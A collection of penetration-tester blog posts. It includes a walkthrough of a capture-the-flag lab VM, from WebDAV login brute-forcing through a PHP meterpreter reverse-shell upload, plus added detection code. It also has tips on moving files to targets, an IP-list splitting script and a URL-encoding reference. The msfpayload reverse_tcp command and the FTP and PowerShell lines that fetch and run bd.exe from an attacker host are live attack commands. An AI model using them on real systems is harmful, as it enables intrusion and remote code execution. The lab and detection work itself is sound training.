Sharpening your knife

From time to time we all go through lulls. In most cases they may be work or personal related, but I always feel it is a good idea to keep working on your skills, even if your current job is not what you want it to be, career-wise. For example, the other day I was checking LinkedIn and came across a post about a new “CTF” VMware framework in one of the pentesting groups I belong to. It was touted as a victim machine with a simple and a more “advanced” version; however, I think the VM I downloaded was fairly straightforward. More or less, I used it as an excuse to play around and “sharpen my knife”.

After downloading the VM, I was presented with a fairly simple webpage that displayed “images”; basically it was some sort of photo album. The album allowed you to search images, register a new user, and log in/log out. After scanning the system with Nmap, I found no additional ports besides SSH and HTTP. So I then proceeded to try basic web attacks (e.g. XSS, SQLi, command injection, etc.). After trying some of those basic attacks, I started to wonder: what if this wasn’t the actual “vulnerable” site, but just a decoy? I pulled up my trusty go-to tool, dirbuster. If you have not used dirbuster, it basically allows you to “brute-force” file and folder locations.


After letting dirbuster do its thing, I was intrigued by the directory “/webdav/”, which presented me with a login prompt. I tried a few simple username/password combinations (e.g. admin/admin, admin/password, etc.).


After a few failed attempts, I decided to use the Metasploit “auxiliary/scanner/http/http_login” module to see if I could find a correct pair. I have a few word-lists that I use, but in this case you can use the default MSF lists.


BAM!!! We find a successful user/password.


After logging in we are presented with a blank page.


So I decided to use cadaver to log in and see what we can do with the server.

cadaver http://192.168.1.12/webdav/

Once I was in, I wanted to see if I had full permissions to upload a file. I did a “mkcol test”, which made a collection named test. Now we can make a backdoor and see if we can get a shell on the box. Using MSF, I made a php backdoor.

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=80 R > backdoor.php

Then, back in the cadaver window, I issued the “put /root/ods/backdoor.php” command to upload it to the server. Now we set up Metasploit to catch our payload using “multi handler”, browse to the file, and we have a session…simple as that.
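From the defender's side, the whole chain above leaves a very recognisable trail in the web server's access log. The following is an added example (not part of the original post): a small Python detector run over a few constructed Apache combined-format log lines that flags repeated 401s against /webdav/ (the http_login guessing), MKCOL/PUT writes into the share, a PUT of a server-side script, and the later GET that triggers it. The IPs, timestamps, username and user agents in the sample are constructed.

```python
import re
from collections import Counter

# Apache "combined" format; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
DAV_WRITE = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE", "PROPPATCH"}
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp", ".cgi", ".pl")

# Constructed log lines (not from the original post) mirroring the walkthrough:
# three failed guesses, MKCOL, PUT of a PHP file, then a GET of that file.
SAMPLE_LOG = """\
192.168.1.13 - - [10/Mar/2014:10:01:01 -0500] "GET /webdav/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.1.13 - - [10/Mar/2014:10:01:02 -0500] "GET /webdav/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.1.13 - - [10/Mar/2014:10:01:02 -0500] "GET /webdav/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.1.13 - davuser [10/Mar/2014:10:02:10 -0500] "MKCOL /webdav/test/ HTTP/1.1" 201 0 "-" "cadaver"
192.168.1.13 - davuser [10/Mar/2014:10:02:30 -0500] "PUT /webdav/test/backdoor.php HTTP/1.1" 201 0 "-" "cadaver"
192.168.1.13 - - [10/Mar/2014:10:03:00 -0500] "GET /webdav/test/backdoor.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Mar/2014:10:03:05 -0500] "GET /index.php?search=cats HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def detect_webdav_abuse(lines, auth_fail_threshold=3):
    """Return (rule, client_ip, path) findings: password guessing against the
    DAV share, successful writes, script uploads, and execution of an upload."""
    findings, failures, uploaded = [], Counter(), set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, path, status = m["ip"], m["method"], m["path"], int(m["status"])
        if status == 401 and path.startswith("/webdav/"):
            failures[ip] += 1
        if method in DAV_WRITE and 200 <= status < 300:
            findings.append(("dav_write", ip, path))
            if method == "PUT" and path.lower().endswith(SCRIPT_EXT):
                findings.append(("script_upload", ip, path))
                uploaded.add(path)
        if method == "GET" and status == 200 and path.split("?")[0] in uploaded:
            findings.append(("uploaded_script_executed", ip, path))
    for ip, n in failures.items():
        if n >= auth_fail_threshold:
            findings.append(("auth_bruteforce", ip, "/webdav/"))
    return findings

if __name__ == "__main__":
    for finding in detect_webdav_abuse(SAMPLE_LOG.splitlines()):
        print(*finding)
```

The same rules translate directly into a SIEM query; the point is that a DAV share that accepts MKCOL/PUT of script extensions is the real exposure, and the 401 burst in front of it is the early warning.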


Nothing super groundbreaking, but going through the process of learning new environments will only help you “sharpen your knife”. You can learn more about the people that made this VM here, and can download the VM here.

*sighs*, just for my records

I am reading the RTFM and I am slowly adding a lot of one-liners and random things to my toolkit. On older systems you can easily download files to and from your targets using FTP; on most newer OSes (Win 7, 2008/2012, etc.), FTP is not installed or allowed by default.

For example, you can create a simple ftp script and then run it with “ftp -s:ftp.txt”:

open yourattackserver
username
password
get bd.exe
bye

However, this does not work on some modern systems, even if you use the interactive settings “-i” or “-n”. Well, lucky for us, we can use PowerShell.

powershell -command "& { (New-Object System.Net.WebClient).DownloadFile('http://attackerIP/bd.exe','C:\Users\Public\Downloads\bd.exe'); Start-Process 'C:\Users\Public\Downloads\bd.exe' }"

Again, this is nothing new or fancy; I just wanted to share. I am not sure if this is in the RTFM; I am pretty sure I just got lazy and didn’t look. As I write this, I just found this post from a few years ago. So yeah…nothing new. haha!

Dealing with huge IP Lists

So, every once in a while I get odd requests from customers to do silly things. For example, I was on an engagement a few months ago, and my customer wanted me to scan 6 computers at a time. At first, I thought to myself, I am not going to scan 6 computers at a time, that would take forever and you are stupid. Then I thought, hmmm…maybe I can at least figure out something to make it worth my while. The first obstacle I had to overcome was the fact that I had several input lists with hundreds of IP addresses in them. I wrote a small Python script to take a list of IP addresses, sort them, and save them into a new file. This was not necessary, but if you are anal about certain things like I am, it’s easier to have just one list that is nice and neat. Of course, you can do this with sort, awk, etc., but I wanted an excuse to write more in Python. The second obstacle was how to create several lists from this new file, i.e. a billion smaller files, each with 6 IP addresses. So, I wrote a script that takes your IP file and a “number” and then creates files each with that “number” of IP addresses in them.

./ipsplit.py
Usage: ./ipsplit.py (Inputfile) (size)

./ipsort.py
Usage: ./ipsort.py (ipList file) (outputfile)

Nothing super technical or groundbreaking, but it works. Both scripts can be found on my GitHub.
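As an added example (not the author's ipsort.py/ipsplit.py from GitHub), here is the same pair of jobs in Python. The one thing worth getting right is the sort: a plain string sort puts 10.0.0.10 before 10.0.0.9, so the ipaddress module is used to sort numerically, drop duplicates and blank lines, and reject typos before the scan starts; the chunker then writes groups of N addresses to numbered files. The input list is constructed.

```python
import ipaddress
from pathlib import Path

# Constructed, unsorted input (not from the original post) with the string-sort
# trap (10.0.0.9 vs 10.0.0.10), a blank line and a duplicate.
SAMPLE_INPUT = """\
10.0.0.10
192.168.1.5
10.0.0.9

10.0.0.10
172.16.4.1
192.168.1.12
10.0.1.1
"""

def sort_ips(lines):
    """Return unique addresses in numeric order (ipsort.py's job). Blank lines are
    skipped; anything that does not parse raises ValueError so a typo in the
    customer's list is caught before anything is scanned."""
    unique = {ipaddress.ip_address(line.strip()) for line in lines if line.strip()}
    # IPv4 and IPv6 objects are not mutually comparable, so key on (version, value).
    return [str(ip) for ip in sorted(unique, key=lambda ip: (ip.version, int(ip)))]

def split_ips(ips, size):
    """Chunk a list into lists of at most `size` addresses (ipsplit.py's job)."""
    if size < 1:
        raise ValueError("size must be >= 1")
    return [ips[i:i + size] for i in range(0, len(ips), size)]

def write_chunks(ips, size, out_dir, prefix="targets"):
    """Write each chunk to out_dir/prefix_NNN.txt and return the paths created."""
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    paths = []
    for n, chunk in enumerate(split_ips(ips, size), start=1):
        path = out_dir / f"{prefix}_{n:03d}.txt"
        path.write_text("\n".join(chunk) + "\n")
        paths.append(path)
    return paths

if __name__ == "__main__":
    import tempfile
    ips = sort_ips(SAMPLE_INPUT.splitlines())
    for path in write_chunks(ips, 6, tempfile.mkdtemp()):
        print(path, path.read_text().split())
```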

URL Encoding

URL Syntax

https://admin:pass123@www.example.com:80/bio.txt;pp=1?qp=2#Three

URL Part URL Data
Scheme https
User admin
Password pass123
Subdomain www
Domain example.com
Port 80
Path /bio.txt
Path Parameter pp=1
Query Parameter qp=2
Fragment Three

Safe Characters

RFC1738 section 2.2 outlines the safe characters to use in an HTTP URL Scheme:

abcdefghijklmnopqrstuvwxyz0123456789$-_.+!*'(),

Safe characters can be used in URLs without any form of encoding as they aren’t reserved for special use in the construction of the URL.

Unsafe Characters

Per RFC1738 section 2.2, the following characters are unsafe for use in an HTTP URL Scheme:

space < > " # % { } | \ ^ ~ [ ] `

RFC1738 section 2.2 also states that the following characters are reserved in an HTTP URL Scheme:

; / ? : @ = &

RFC3986 section 2.2 additionally specifies reserved characters in URI schemes:

space % : / ? # [ ] @ ! $ & ' ( ) * + , ; =

Unsafe and reserved characters are reserved for use in constructing the URL scheme. These characters must be encoded so the URL can be constructed without ambiguity. Fortunately, RFC1738 has us covered.

URL Encoding

URL encoding, or percent encoding, substitutes a percent sign (%) followed by two hexadecimal digits for each unsafe character in a URL. Here are the encodings for unsafe and reserved characters per RFCs 1738 and 3986:

Unsafe Character    URL (Percent) Encoding
space               %20
%                   %25
:                   %3A
/                   %2F
?                   %3F
#                   %23
[                   %5B
]                   %5D
@                   %40
!                   %21
$                   %24
&                   %26
'                   %27
(                   %28
)                   %29
*                   %2A
+                   %2B
,                   %2C
;                   %3B
=                   %3D
<                   %3C
>                   %3E
"                   %22
{                   %7B
}                   %7D
|                   %7C
\                   %5C
^                   %5E
~                   %7E
`                   %60

URL Encoding “Gotchas”

Stéphane Épardaud describes several pitfalls of URL encoding at the Lunatech Blog (go read his post!). In summary, the reserved characters differ for each part of the URL:

Path

  • spaces must be encoded to %20, not +
  • : @ - . _ ~ ! $ & ` ( ) * + , ; = are allowed unencoded

Path Parameter

  • = is allowed unencoded

Query

  • spaces may be encoded to + (for backward compatibility) or %20. + must be encoded to %2B
  • ? , / are allowed unencoded

Fragment

  • / ? : @ - . _ ~ ! $ & ` ( ) * + , ; = are allowed unencoded
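The practical consequence of the per-component rules above is that a URL has to be encoded one component at a time, with a different safe set for each. As an added example (not from the original post or the Lunatech article), this Python uses urllib.parse with explicit safe sets: spaces become %20 in the path but + in the query, a literal + in the query becomes %2B, ; and = survive in a path segment so a path parameter like bio.txt;pp=1 stays intact, and / is escaped inside a segment so a value cannot add a path level. The URL values are constructed.

```python
from urllib.parse import quote, quote_plus, unquote, unquote_plus, urlunsplit

# Sub-delimiters a path segment or fragment may carry unencoded (the "allowed
# unencoded" sets above). Letters, digits and -._~ are unreserved and always safe;
# '/' is deliberately left out of the segment set so a value cannot add a path level.
SEGMENT_SAFE = ":@!$&'()*+,;="
FRAGMENT_SAFE = "/?" + SEGMENT_SAFE

def encode_path_segment(segment):
    """Path rules: space -> %20 (never +), ';' and '=' stay so 'bio.txt;pp=1'
    keeps its path parameter, '/' -> %2F."""
    return quote(segment, safe=SEGMENT_SAFE)

def encode_query(params):
    """Query (form) rules: space -> '+', literal '+' -> %2B, and '&'/'=' inside a
    key or value are escaped so they cannot split or merge pairs."""
    return "&".join(quote_plus(k, safe="") + "=" + quote_plus(v, safe="")
                    for k, v in params)

def encode_fragment(fragment):
    """Fragment rules: '/' and '?' may also stay unencoded."""
    return quote(fragment, safe=FRAGMENT_SAFE)

def decode_path_segment(segment):
    """In a path '+' is a literal plus; only %XX sequences are decoded."""
    return unquote(segment)

def decode_query_value(value):
    """In a query '+' is a space; %2B is the only way to get a real plus back."""
    return unquote_plus(value)

def build_url(scheme, netloc, segments, params, fragment=""):
    """Assemble a URL, encoding each component with its own rules."""
    path = "/" + "/".join(encode_path_segment(s) for s in segments)
    return urlunsplit((scheme, netloc, path, encode_query(params),
                       encode_fragment(fragment)))

if __name__ == "__main__":
    print(build_url("https", "www.example.com", ["my files", "bio.txt;pp=1"],
                    [("qp", "2"), ("q", "a+b c")], "Three"))
    # https://www.example.com/my%20files/bio.txt;pp=1?qp=2&q=a%2Bb+c#Three
```

Decoding has to follow the same split: decode_query_value("a+b") gives a space where decode_path_segment("a+b") keeps the plus, which is exactly the mismatch that bites code that percent-decodes a whole URL in one pass.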

For more information

  1. RFC1738 – Uniform Resource Locators
  2. RFC3986 – Uniform Resource Identifiers
  3. What every web developer must know about URL encoding